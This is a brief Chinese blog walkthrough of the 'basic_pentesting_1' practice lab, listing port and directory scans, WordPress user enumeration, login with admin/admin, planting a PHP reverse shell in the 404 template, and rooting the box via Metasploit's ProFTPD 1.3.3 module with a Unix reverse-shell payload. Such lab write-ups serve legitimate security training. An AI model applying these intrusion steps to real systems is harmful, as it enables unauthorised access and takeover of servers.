靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】

随风随梦自在逍遥2024-01-19 9:44

basic_pentesting_1【VX订阅号:0x00实验室】

arp-scan扫描靶机IP

masscan 192.168.253.153 --ports 0-65535 --rate=10000端口扫描

nmap扫描nmap -T5 -A -p- 192.168.253.153

21:ProFTPD 1.3.3

dirb http://192.168.253.153 目录扫描

http://192.168.253.153/secret/发现网站cms是wordpress

wpscan --url http://192.168.253.153/secret/

知道版本WordPress 4.9.24

msf没发现可利用漏洞

wpscan --url http://192.168.253.153/secret/ --enumerate u用户名枚举

admin/admin直接进来了

404界面写入phpshell

shell:反弹的phpwebshellphp-reverse-shell.php 默认目录及文件名/usr/share/webshells/php

把IP和port改成自己的,监听反弹

404监听不行,监听不到
WordPress 6.4.1

上传可以

在上传路径找到自己上传文件

换个方法

ftp端口开着

ProFTPD

搜索可利用模块search ProFTPD 1.3.3

设置payload,输入set payload cmd/unix/reverse、

设置目的地址和源地址

运行

获得root权限

相关推荐
祁白_3 小时前
[0xV01D]_Night Traffic_writeUp
网络·安全·ctf·writeup
xingyuzhisuan3 小时前
网络 Token 常见故障原理,基础排查科普
运维·服务器·网络·php
学习3人组4 小时前
企业交换机OSPF路由协议配置与防护
网络
一拳一个娘娘腔4 小时前
【SRC漏洞挖掘系列】第10期:GraphQL & API 安全 —— 现代 API 的“裸奔”时代
后端·安全·graphql
青风975 小时前
SDDGR:基于稳定扩散的深度生成重放,用于类增量对象检测(CVPR 2024)
网络·人工智能·深度学习·神经网络·计算机视觉
云栖梦泽在5 小时前
AI安全实战:AI系统应急响应的实战演练案例
大数据·人工智能·安全
Chockmans6 小时前
春秋云境CVE-2020-21652(极速版)
计算机网络·安全·web安全·网络安全·安全威胁分析·春秋云境·cve-2020-21652
byte轻骑兵7 小时前
【HID】规范精讲[20]: 蓝牙HID低功耗黑科技——Sniff Subrating如何让设备续航翻倍?
网络·科技·人机交互·hid·蓝牙键盘
Raink老师7 小时前
【AI面试临阵磨枪-76】社交 AI:内容生成、审核、智能回复、多模态理解、安全治理
人工智能·安全·面试
liana87448 小时前
私有化视频会议:把会议室“搬”进自己的网络
网络
热门推荐
01GitHub 镜像站点02DeepSeek V4 + Claude Code thinking mode 400 错误修复方案03【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法04Codex 接入 DeepSeek API 完整配置文档05【AI】2026 年具身智能模型和世界模型总结06CC-Switch & Claude 基于 Linux 服务器安装使用指南07裂开!ChatGPT 居然开始要手机号验证,附详细解决方法08CC-Switch 全平台下载、安装与使用全指南(Windows/macOS/Linux)092026年AI编程工具终极横评:Cursor vs Claude Code vs Copilot10OpenAI Codex Desktop App 保姆级安装教程(Windows / Mac)